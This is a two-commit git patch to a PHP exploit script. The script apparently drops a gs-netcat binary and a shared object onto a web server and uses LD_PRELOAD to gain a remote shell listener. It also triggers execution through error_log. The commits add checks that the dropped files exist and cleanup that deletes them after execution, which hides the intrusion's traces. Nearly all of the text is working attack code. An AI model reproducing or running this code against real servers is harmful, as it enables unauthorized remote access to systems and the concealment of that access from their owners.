From 5c697c2d56d7c7557a72ced2bf9235b3783021ec Mon Sep 17 00:00:00 2001 From: Cvar1984 Date: Fri, 9 Aug 2024 17:17:40 +0700 Subject: [PATCH 1/2] cleanup after execution --- exploit.php | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exploit.php b/exploit.php index d94ab89..b7dbb71 100644 --- a/exploit.php +++ b/exploit.php @@ -29,7 +29,7 @@ function unpack_object($object) echo 'gs-netcat -is ' . $secret_key; $absolute_path = realpath(getcwd()); -$gs_args = sprintf('-k %s/.env -il', $absolute_path); +$gs_args = sprintf('-k %s/.env-gs -il', $absolute_path); file_put_contents($absolute_path . '/.env', $secret_key); chmod($absolute_path . '/.env', 0600); @@ -57,3 +57,10 @@ function unpack_object($object) } elseif(function_exists('error_log')) { @error_log('a',1,'a'); } + +// cleanup +sleep(3); + +unlink($absolute_path . '/x64_nc'); +unlink($absolute_path . '/x64.so'); +unlink($absolute_path . '/.env-gs'); \ No newline at end of file From b1dd02475016b26f3d4d2b161c7683dc3f75401e Mon Sep 17 00:00:00 2001 From: Cvar1984 Date: Fri, 9 Aug 2024 17:26:45 +0700 Subject: [PATCH 2/2] check shared object before execution --- exploit.php | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/exploit.php b/exploit.php index b7dbb71..bc3b589 100644 --- a/exploit.php +++ b/exploit.php @@ -40,6 +40,17 @@ function unpack_object($object) file_put_contents('x64_nc', $gs_ncat_bin_x64); chmod('x64_nc', 0755); +// check object +if (filesize($absolute_path . '/x64.so') == 0) { + die('Unable to put shared object please compile and place it manually'); +} +if (filesize($absolute_path . '/x64_nc') == 0) { + die('Unable to put elf please compile and place it manually'); +} +if (filesize($absolute_path . '/.env-gs') == 0) { + die('Unable to put environment please do it manually'); +} + // set environment variables putenv(sprintf('PRELOAD=%s', $absolute_path . '/x64_nc')); putenv(sprintf('LD_PRELOAD=%s', $absolute_path . '/x64.so')); @@ -61,6 +72,6 @@ function unpack_object($object) // cleanup sleep(3); -unlink($absolute_path . '/x64_nc'); unlink($absolute_path . '/x64.so'); +unlink($absolute_path . '/x64_nc'); unlink($absolute_path . '/.env-gs'); \ No newline at end of file